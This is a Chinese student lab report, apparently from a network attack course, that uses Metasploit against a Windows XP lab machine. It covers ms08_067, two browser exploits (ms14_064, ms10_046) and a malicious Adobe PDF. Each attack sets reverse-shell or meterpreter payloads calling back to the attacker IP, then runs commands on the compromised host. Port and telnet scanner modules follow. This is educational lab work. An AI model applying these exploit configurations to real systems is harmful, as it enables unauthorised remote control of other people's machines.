zoukankan      html  css  js  c++  java
  • 2019-2020-2 20175216 《网络对抗技术》Exp6 MSF基础应用

    2019-2020-2 20175216 《网络对抗技术》Exp6 MSF基础应用

    实践内容

    一个主动攻击实践

    ms08_067

    • Windows Xp的IP:192.168.170.155 kali的IP:192.168.170.142, XPping一下kali
      1.ping通.PNG

    • 启动msfconsole,然后输入search ms08_067查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi,如下图所示:

    查找漏洞.PNG

    • 输入指令 use exploit/windows/smb/ms08_067_netapi 进入攻击模块,使用 show payloads,查看能够使用的payloads

    show.PNG

    • 使用指令 set payload generic/shell_reverse_tcp 设置payload为反向tcp连接,使用 show options 查看可以设置的参数

    设置有效载荷.PNG

    • 设置参数
    set RHOST 192.168.170.155 //设置靶机IP
    set LPORT 5216  //设置攻击机端口
    set LHOST 192.168.170.142//设置攻击机IP
    exploit
    

    exploit.PNG

    • 回连成功之后输入ipconfig查看信息

    查看IP地址.PNG
    ip1.PNG

    • 输入net user查看Win目前的用户名

    用户.PNG

    一个针对浏览器的攻击

    ms14_064

    • 启动msfconsole,然后输入search ms14_064 查找该漏洞使用的攻击模块,攻击模块为windows/browser/ms14_064_ole_code_execution,如下图所示:

    4.0.PNG

    • 使用use windows/browser/ms14_064_ole_code_execution设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options 查看要设置的参数

    4.7.PNG

    • 设置参数
    set LHOST 192.168.170.142
    set LPORT 5216
    set URIPATH 5216zxy//设置url域名
    exploit
    

    4.8.PNG

    • 在Windows Xp浏览器输入http://192.168.170.142:8080/5216zxy

    4.3.PNG
    4.4.PNG

    • 用指令sessions 查看会话信息

    4.5.PNG

    • 通过输入sessions -i 1获取第一个会话连接,并输入ipconfig验证是否为靶机地址,使用dir查看文件目录

    4.6.PNG

    ms10_046

    • 启动msfconsole,然后输入searchms10_046 查找该漏洞使用的攻击模块,攻击模块为exploit/windows/browser/ms10_046_shortcut_icon_dllloader,如下图所示:

    777.PNG

    • 使用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options 查看要设置的参数

    888.PNG

    • 设置参数
    set SRVHOST 192.168.170.142
    set LHOST 192.168.170.142
    exploit
    

    666.PNG

    • 在windows XP的浏览器中访问刚刚设置的服务器IPhttp://192.168.170.142弹出如下窗口

    555.PNG

    • 同时攻击者会开始监听并与靶机建立连接。

    222.PNG

    • 输入sessions查看有多少主机被反向链接到攻击者和靶机对应的序号。

    • 输入sessions -i 1控制靶机(-i后面的数即为靶机对应的序号),并输入ipconfig查看主机IP地址

    333.PNG

    444.PNG

    一个针对客户端的攻击

    Adobe

    • 启动msfconsole,然后输入search adobe查找该漏洞使用的攻击模块,攻击模块为exploit/windows/fileformat/adobe_toolbutton,如下图所示:

    3.search adobe.PNG

    • 使用use exploit/windows/fileformat/adobe_toolbutton设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options 查看要设置的参数

    3.设置载荷.PNG

    • 设置参数
    set RHOST 192.168.170.155//设置靶机IP
    set LPORT 5216  //设置攻击机端口
    set LHOST 192.168.170.142 //设置攻击机IP
    exploit
    

    3.创建adobe.PNG

    • 在linux中另外打开一个终端,msfconsole进入控制台
    • 输入use exploit/multi/handler使用监听模块,设置payload
    • 使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp
    • set LHOST 192.168.170.142
    • 端口号也相同:set LPORT 5216
    • 设置完成后,exploit开始监听

    3.反向链接.PNG

    • 靶机中打开msf.pdf文件,靶机上钩,攻击成功
    • kali中发现回连成功

    3.adobe链接成功.PNG

    • 输入ipconfig

    3.success.PNG

    成功应用任何一个辅助模块

    cert辅助模块(唯一)

    • cert的扫描仪模块是一个有用的管理扫描仪,可以覆盖一个子网来检查服务器证书是否过期
    • 输入search cert首先查看辅助模块cert辅助模块的信息

    10.5.PNG

    • 设置参数
    use auxiliary/scanner/telnet/telnet_version
    set RHOSTS 192.168.170.142/24
    set THREADS 50
    run
    

    10.1.PNG

    10.2.PNG

    TCP"XMas"端口扫描(唯一)

    • 该模块的主要作用是判断端口是开放还是关闭,结果表示端口是开放或者被过滤(屏蔽)的.
    • 输入search xmas首先查看xmas辅助模块的信息
      8.2.PNG
    • 设置参数
    use auxiliary/scanner/portscan/xmas
    set RHOST 192.168.170.142
    set ports 5216
    run
    

    8.1.PNG

    实验总结

    实验问题回答

    用自己的话解释什么是exploit,payload,encode.

    • exploit就是通过漏洞将自己的恶意代码植入目标主机从而达到攻击的目的
    • payload是载荷,里面包含了攻击者想要执行的代码
    • encode可以对恶意代码进行伪装,使其不被目标主机发现,从而达到攻击的目的。

    离实战还缺些什么技术或步骤?
    现在做的实验大多都是针对已经淘汰掉的系统进行的攻击,这些系统的版本已经很久没有更新过了,对他们进行攻击会相对容易一些,还有就是咱们既然可以学习这些攻击技术,那些做软件做系统的也能学到,他们已经对自己的软件和系统做了很多的测试,要想真正的去攻击真的挺难的。

    实践体会

    在做实验的过程中,这次实验让我系统地了解了它的六大模块,msf的功能有点强啊,不过要学的知识还有很多,路漫漫其修远兮,吾将上下而求索。做实验过程中最难过的时候,就在你做了那么多操作,就差最后一步的时候,它却没有攻击成功。
    从我们做过的实验来看,有很大一部分攻击都是源于被攻击者的安全意识不够,如果安全意识得到提高,被攻击的概率就会下降。

  • 相关阅读:
    gulp + es6 + babel+ angular 搭建环境并实现简单的路由
    【SAS BASE】FORMAT Statement及PROC FORMAT
    【SAS BASE】PROC PRINT
    【SAS BASE】PROC SORT
    【SAS BASE】ARRAY语句及多变量简写
    【SAS BASE】SAS函数
    【SAS BASE】PROC CONTENTS与LABEL
    【SAS BASE】SAS格式、缺失值表示、命名规则及路径
    【SAS BASE】IMPORT过程(适用于CSV文件及其他分隔符文件)
    【SAS BASE】通过DATA步导入数据注意事项(适用于text、ASCII、sequential、flat文件)
  • 原文地址:https://www.cnblogs.com/besti20175216/p/12782679.html
Copyright © 2011-2022 走看看